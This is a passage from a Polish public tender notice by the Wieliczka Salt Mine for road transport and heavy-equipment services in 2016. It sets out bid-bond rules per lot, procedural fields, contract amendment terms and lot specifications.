z dopiskiem: wadium w sprawie KSW/2016/EL/20  część I zamówienia
(dotyczy Wykonawców składających oferty na część I zamówienia)
Za termin wniesienia wadium w formie pieniężnej zostanie przyjęty termin uznania rachunku Zamawiającego.
Nie dopuszcza się wpłaty wadium w kasie Kopalni Soli Wieliczka S.A.
3.	Wadium wniesione w innej formie niż forma pieniężna (zgodnie z przepisami ustawy Prawo zamówień publicznych) winno być złożone w Sekretariacie Kopalni Soli Wieliczka S.A. przed upływem terminu składania ofert określonym w części XIV pkt 2 specyfikacji.
4.	Zamawiający dokona zwrotu wadium zgodnie z art. 46 ustawy.
5.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 i 3a ustawy, z przyczyn leżących po jego stronie, nie złożył oświadczeń lub dokumentów potwierdzających okoliczności, o których mowa w art. 25 ust. 1 ustawy, oświadczenia, o którym mowa w art. 25a ust. 1 ustawy, pełnomocnictw lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3 ustawy, co spowodowało brak możliwości wybrania oferty złożonej przez Wykonawcę jako najkorzystniejszej.
6.	Zgodnie z art. 46 ust 5 ustawy, Zamawiający zatrzymuje wadium wraz  z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
1)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
2)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe  z przyczyn leżących po stronie Wykonawcy.
7.	Oferta Wykonawcy, który nie wniesie wymaganego wadium do upływu terminu składania ofert, na przedłużony okres związania ofertą lub w terminie, o którym mowa w art. 46 ust. 3 ustawy albo nie zgodzi się na przedłużenie okresu związania ofertą, zostanie odrzucona na podstawie art. 89 ust. 1 pkt 7b ustawy.

Część II zamówienia  Usługi krajowego transportu drogowego rzeczy samochodem o dopuszczalnej masie całkowitej do 3,5 t.
1.	Wadium w wysokości: 1 000,00 złotych należy wnieść przed upływem terminu składania ofert, określonym w części XIV pkt 2 specyfikacji.
2.	Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy:
Bank Pekao Spółka Akcyjna Oddział w Wieliczce
Konto: 75124047481111000048778501 
z dopiskiem: wadium w sprawie KSW/2016/EL/20  część II zamówienia
(dotyczy Wykonawców składających oferty na część II zamówienia)
Za termin wniesienia wadium w formie pieniężnej zostanie przyjęty termin uznania rachunku Zamawiającego.
Nie dopuszcza się wpłaty wadium w kasie Kopalni Soli Wieliczka S.A.
3.	Wadium wniesione w innej formie niż forma pieniężna (zgodnie z przepisami ustawy Prawo zamówień publicznych) winno być złożone w Sekretariacie Kopalni Soli Wieliczka S.A. przed upływem terminu składania ofert określonym w części XIV pkt 2 specyfikacji.
4.	Zamawiający dokona zwrotu wadium zgodnie z art. 46 ustawy.
5.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 i 3a ustawy, z przyczyn leżących po jego stronie, nie złożył oświadczeń lub dokumentów potwierdzających okoliczności, o których mowa w art. 25 ust. 1 ustawy, oświadczenia, o którym mowa w art. 25a ust. 1 ustawy, pełnomocnictw lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3 ustawy, co spowodowało brak możliwości wybrania oferty złożonej przez Wykonawcę jako najkorzystniejszej.
6.	Zgodnie z art. 46 ust 5 ustawy, Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
1)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
2)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
7.	Oferta Wykonawcy, który nie wniesie wymaganego wadium do upływu terminu składania ofert, na przedłużony okres związania ofertą lub w terminie, o którym mowa w art. 46 ust. 3 ustawy albo nie zgodzi się na przedłużenie okresu związania ofertą zostanie odrzucona na podstawie art. 89 ust. 1 pkt 7b ustawy.

Część III zamówienia  Usługi krajowego transportu drogowego  samochodem ciężarowym o dopuszczalnej masie całkowitej do 14,5 t. Transport 3 szt. zbiorników o pojemności 1 m3 napełnianych mieszanką do iniekcji (solanka z cementem) 
1.	Wadium w wysokości: 2 500,00 złotych należy wnieść przed upływem terminu składania ofert, określonym w części XIV pkt 2 specyfikacji.
2.	Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy:
Bank Pekao Spółka Akcyjna Oddział w Wieliczce
Konto: 75124047481111000048778501 
z dopiskiem: wadium w sprawie KSW/2016/EL/20  część III zamówienia
(dotyczy Wykonawców składających oferty na część III zamówienia)
Za termin wniesienia wadium w formie pieniężnej zostanie przyjęty termin uznania rachunku Zamawiającego.
Nie dopuszcza się wpłaty wadium w kasie Kopalni Soli Wieliczka S.A.
3.	Wadium wniesione w innej formie niż forma pieniężna (zgodnie z przepisami ustawy Prawo zamówień publicznych) winno być złożone w Sekretariacie Kopalni Soli Wieliczka S.A. przed upływem terminu składania ofert określonym w części XIV pkt 2 specyfikacji.
4.	Zamawiający dokona zwrotu wadium zgodnie z art. 46 ustawy.
5.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 i 3a ustawy, z przyczyn leżących po jego stronie, nie złożył oświadczeń lub dokumentów potwierdzających okoliczności, o których mowa w art. 25 ust. 1 ustawy, oświadczenia, o którym mowa w art. 25a ust. 1 ustawy, pełnomocnictw lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3 ustawy, co spowodowało brak możliwości wybrania oferty złożonej przez Wykonawcę jako najkorzystniejszej.
6.	Zgodnie z art. 46 ust 5 ustawy, Zamawiający zatrzymuje wadium wraz  z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
1)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
2)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
7.	Oferta Wykonawcy, który nie wniesie wymaganego wadium do upływu terminu składania ofert, na przedłużony okres związania ofertą lub w terminie, o którym mowa w art. 46 ust. 3 ustawy albo nie zgodzi się na przedłużenie okresu związania ofertą zostanie odrzucona na podstawie art. 89 ust. 1 pkt 7b ustawy.

Część IV zamówienia  Usługi sprzętem ciężkim oraz samochodem ciężarowym o dopuszczalnej masie całkowitej do 24 ton
1.	Wadium w wysokości: 500,00 złotych należy wnieść przed upływem terminu składania ofert, określonym w części XIV pkt 2 specyfikacji.
2.	Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy:
Bank Pekao Spółka Akcyjna Oddział w Wieliczce
Konto: 75124047481111000048778501 
z dopiskiem: wadium w sprawie KSW/2016/EL/20  część IV zamówienia
(dotyczy Wykonawców składających oferty na część IV zamówienia)
Za termin wniesienia wadium w formie pieniężnej zostanie przyjęty termin uznania rachunku Zamawiającego.
Nie dopuszcza się wpłaty wadium w kasie Kopalni Soli Wieliczka S.A.
3.	Wadium wniesione w innej formie niż forma pieniężna (zgodnie z przepisami ustawy Prawo zamówień publicznych) winno być złożone w Sekretariacie Kopalni Soli Wieliczka S.A. przed upływem terminu składania ofert określonym w części XIV pkt 2 specyfikacji.
4.	Zamawiający dokona zwrotu wadium zgodnie z art. 46 ustawy.
5.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 i 3a ustawy, z przyczyn leżących po jego stronie, nie złożył oświadczeń lub dokumentów potwierdzających okoliczności, o których mowa w art. 25 ust. 1 ustawy, oświadczenia, o którym mowa w art. 25a ust. 1 ustawy, pełnomocnictw lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3 ustawy, co spowodowało brak możliwości wybrania oferty złożonej przez Wykonawcę jako najkorzystniejszej.
6.	Zgodnie z art. 46 ust 5 ustawy, Zamawiający zatrzymuje wadium wraz  z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
1)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
2)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe  z przyczyn leżących po stronie Wykonawcy.
7.	Oferta Wykonawcy, który nie wniesie wymaganego wadium do upływu terminu składania ofert, na przedłużony okres związania ofertą lub w terminie, o którym mowa w art. 46 ust. 3 ustawy albo nie zgodzi się na przedłużenie okresu związania ofertą zostanie odrzucona na podstawie art. 89 ust. 1 pkt 7b ustawy.

Część V zamówienia  Usługi dźwigiem samochodowym
1.	Wadium w wysokości: 200,00 złotych należy wnieść przed upływem terminu składania ofert, określonym w części XIV pkt 2 specyfikacji.
2.	Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy:
Bank Pekao Spółka Akcyjna Oddział w Wieliczce
Konto: 75124047481111000048778501 
z dopiskiem: wadium w sprawie KSW/2016/EL/20  część V zamówienia
(dotyczy Wykonawców składających oferty na część V zamówienia)
Za termin wniesienia wadium w formie pieniężnej zostanie przyjęty termin uznania rachunku Zamawiającego.
Nie dopuszcza się wpłaty wadium w kasie Kopalni Soli Wieliczka S.A.
3.	Wadium wniesione w innej formie niż forma pieniężna (zgodnie z przepisami ustawy Prawo zamówień publicznych) winno być złożone w Sekretariacie Kopalni Soli Wieliczka S.A. przed upływem terminu składania ofert określonym w części XIV pkt 2 specyfikacji.
4.	Zamawiający dokona zwrotu wadium zgodnie z art. 46 ustawy.
5.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 i 3a ustawy, z przyczyn leżących po jego stronie, nie złożył oświadczeń lub dokumentów potwierdzających okoliczności, o których mowa w art. 25 ust. 1 ustawy, oświadczenia, o którym mowa w art. 25a ust. 1 ustawy, pełnomocnictw lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3 ustawy, co spowodowało brak możliwości wybrania oferty złożonej przez Wykonawcę jako najkorzystniejszej.
6.	Zgodnie z art. 46 ust 5 ustawy, Zamawiający zatrzymuje wadium wraz  z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
1)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
2)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe  z przyczyn leżących po stronie Wykonawcy.
7.	Oferta Wykonawcy, który nie wniesie wymaganego wadium do upływu terminu składania ofert, na przedłużony okres związania ofertą lub w terminie, o którym mowa w art. 46 ust. 3 ustawy albo nie zgodzi się na przedłużenie okresu związania ofertą zostanie odrzucona na podstawie art. 89 ust. 1 pkt 7b ustawy.
</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br />
                  z kilkoma wykonawcami
                <br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>100.00</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />1.	Stosownie do brzmienia art. 144 ust. 1 pkt 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych /Dz.U.2015.2164 j.t. ze zm./, przewiduje się możliwość dokonania zmiany umowy w następujących przypadkach:
1)	w przypadku niedokonania przez Zamawiającego zlecenia usług w maksymalnej ilości, o której mowa w § 2 ust. 2  umowy, dopuszcza się możliwość jednokrotnego przedłużenia okresu obowiązywania umowy, o którym mowa w § 5 ust. 1 umowy, o okres do 6 miesięcy. W przypadku przedłużenia okresu obowiązywania umowy, przedłużony zostanie termin na odstąpienie od umowy przez Zamawiającego, określony w § 11 ust. 6 umowy, o okres przedłużenia okresu obowiązywania umowy.
2.	Oprócz okoliczności wskazanych w ust. 1, zmiany umowy mogą nastąpić wyłącznie w przypadkach określonych w art. 144 ust. ust. 1-1b, 1d i 1e ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych /Dz.U.2015.2164 j.t. ze zm./.
3.	Zaistnienie przyczyn, wymienionych w pkt 1 nie powoduje powstania u żadnej ze Stron umowy, roszczenia o zmianę umowy.
4.	W przypadku zaistnienia, którejkolwiek z przyczyn, wymienionych w pkt 1 każdej ze Stron umowy przysługuje prawo do wystąpienia do drugiej strony o zmianę umowy. Wystąpienie o dokonanie zmiany winno zawierać:
1)	szczegółowy opis przyczyn uzasadniających zmianę umowy,
2)	uzasadnienie dokonania zmiany umowy,
5.	Wystąpienie, o którym mowa w pkt 4 stanowi podstawę do podjęcia negocjacji w sprawie zmiany umowy.
6.	Zmiana umowy wymaga zachowania formy pisemnej pod rygorem nieważności.
7.	Zmian umowy dokonuje się w formie aneksów, którym nadaje się kolejne numery.
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 01/09/2016, godzina: 12:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              język polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>Usługi krajowego transportu drogowego osób <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1. Przedmiotem zamówienia są usługi krajowego transportu samochodowego:
a) samochodem osobowym,
b) autobusem-mikrobusem oraz
c) autobusem.
2.  Szczegółowy opis rodzajów usług oraz ich maksymalną wielkość dla danego środka transportu został określony poniżej.
Rodzaj usługi: Samochód osobowy.
Szczegółowe wymogi:
1) przeznaczenie konstrukcyjne - do przewozu 5 osób łącznie z kierowcą,
2) rodzaj nadwozia - sedan, czterodrzwiowe,
3) dopuszczalna masa całkowita - do 3,5 tony,
4) pojemność silnika - powyżej 1500 cm3,
5) wyposażenie: klimatyzacja,
6) rok produkcji: nie wcześniej niż 2008r.	
Maksymalna wielkość zamówienia: do 6 000 km, ilość godzin postoju do 100
Rodzaj usługi: Autobus.
Szczegółowe wymogi: 
1) przeznaczenie konstrukcyjne  przewóz minimum 46 osób łącznie z kierowcą,
2) typ zabudowy: turystyczny,
3) wyposażenie: klimatyzacja, pasy bezpieczeństwa, WC, ABS, ASR, retarder, ESP,
4) rok produkcji: nie wcześniej niż 2008r.	
Maksymalna wielkość zamówienia - do 7 000 km.
Rodzaj usługi: Autobus - mikrobus.
Szczegółowe wymogi:
1) przeznaczenie konstrukcyjne  przewóz od 17 do 21 osób łącznie z kierowcą,
2) rok produkcji: nie wcześniej niż 2010r.,
3) wyposażenie: klimatyzacja, pasy bezpieczeństwa,
Maksymalna wielkość zamówienia: do 7 000 km, ilość godzin postoju do 60.
3. Zamawiający zobowiązuje się do zlecenia wykonania usług, które są przedmiotem niniejszego zamówienia, o wartości 60% maksymalnej wartości tych usług. Zlecenie wykonania pozostałych usług, o wartości 40% maksymalnej wartości usług, zależeć będzie od potrzeb Zamawiającego (prawo opcji).
Szczegółowe warunki realizacji części I zamówienia zawarte zostały we wzorze umowy stanowiącym załącznik nr 16 do SIWZ.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>60171000-7, 60172000-4<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 12<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>100.00</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Usługi krajowego transportu drogowego rzeczy samochodem o dopuszczalnej masie całkowitej do 3,5 t<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1. Przedmiotem zamówienia są usługi krajowego transportu samochodowego samochodem ciężarowo-osobowym przeznaczonym do przewozu ładunków i osób.
2. Szczegółowy opis usługi został opisany poniżej.
Rodzaj usługi: Samochód ciężarowo-osobowy.
Szczegółowe wymogi: 
1) przeznaczenie konstrukcyjne:
a) przewóz ładunków,
b) przewóz osób w liczbie do 3 łącznie z kierowcą,
2) typ zabudowy: blaszak,
3) dopuszczalna masa całkowita  nie przekraczająca 3,5 tony,
4) ładowność  min. 1,0 tony,
5) długość skrzyni ładunkowej - min 3,0 m,
6) wyposażenie: klimatyzacja,
7) rok produkcji: nie wcześniej niż 2010r.	
Maksymalna wielkość zamówienia - do 20 000 km, ilość godzin postoju do 150.
3. Zamawiający zobowiązuje się do zlecenia wykonania usług, które są przedmiotem niniejszego zamówienia, o wartości 60% maksymalnej wartości tych usług. Zlecenie wykonania pozostałych usług o wartości 40% maksymalnej wartości usług, zależeć będzie od potrzeb Zamawiającego (prawo opcji).
Szczegółowe warunki realizacji części II zamówienia zawarte zostały we wzorze umowy stanowiącym załącznik nr 17 do SIWZ.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>60181000-0<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 12<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>100.00</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>3
                  
                <b>Nazwa: </b>Usługi krajowego transportu drogowego  samochodem ciężarowym o dopuszczalnej masie całkowitej do 14,5 t.  Transport 3 szt. zbiorników o pojemności 1 m3 napełnianych mieszanką do iniekcji (solanka z cementem)<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1. Przedmiotem zamówienia są usługi krajowego transportu samochodowego samochodem ciężarowym przeznaczonym do przewozu ładunków.
2. Transport będzie się odbywał wyłącznie na terenie miasta Wieliczki i będzie obejmował każdorazowo 3 zbiorniki o pojemności 1 m3 każdy, napełnianych mieszanką do iniekcji (solanka pełnonasycona z cementem).
3. Trasa transportu obejmuje: załadunek (napełnianie zbiorników) w rejonie Szybu Kościuszko przy ul. Kościuszki 2 oraz rozładunek (opróżnianie zbiorników) w rejonie szybu Wilson przy ul. Pułaskiego 10.
4. Załadunek oraz rozładunek (napełnianie zbiorników mieszanką do iniekcji) będzie się odbywał bez zdejmowania zbiorników z samochodu.
5. Przez kurs należy rozumieć pokonanie przez jeden samochód trasy: Szyb Kościuszko  Szyb Wilson  Szyb Kościuszko lub Szyb Kościuszko  Szyb Wilson.
6. Przez godzinę postoju rozumie się każdą rozpoczętą przez jeden samochód godzinę zegarową pod załadunkiem lub rozładunkiem powyżej 30 minut postoju.
7. Na żądanie Zamawiającego, Wykonawca jest zobowiązany realizować usługi transportowe dwoma samochodami ciężarowymi jednocześnie.
8. Zamawiający szacuje, że przy użyciu jednego samochodu, Wykonawca zrealizuje od 10 do 15 kursów w ciągu doby.
9. Zamawiający szacuje, że przy użyciu dwóch samochodów jednocześnie, Wykonawca zrealizuje od 20 do 30 kursów w ciągu doby. 
10. Zamawiający szacuje, że w ramach jednego kursu czas pod załadunkiem lub rozładunkiem nie przekroczy jednej godziny zegarowej.
11. Szczegółowy opis usługi został opisany poniżej.
Rodzaj usługi: Samochód ciężarowy wywrotka.
Szczegółowe wymogi: 
1) Dopuszczana masa całkowita nie przekraczająca 14,5 tony,
2) Ładowność  min. 7 tony,
3) Długość skrzyni ładunkowej min. 4,8 m,
4) HDS w wersji plecakowej dopinany z tyłu.
Maksymalna wielkość zamówienia - do 700 kursów, ilość godzin postoju do 700.
12. Zamawiający zobowiązuje się do zlecenia wykonania usług, które są przedmiotem niniejszego zamówienia, o wartości 60% maksymalnej wartości tych usług. Zlecenie wykonania pozostałych usług o wartości 40% maksymalnej wartości usług, zależeć będzie od potrzeb Zamawiającego (prawo opcji).
Szczegółowe warunki realizacji części III zamówienia zawarte zostały we wzorze umowy stanowiącym załącznik nr 18 do SIWZ<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45500000-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
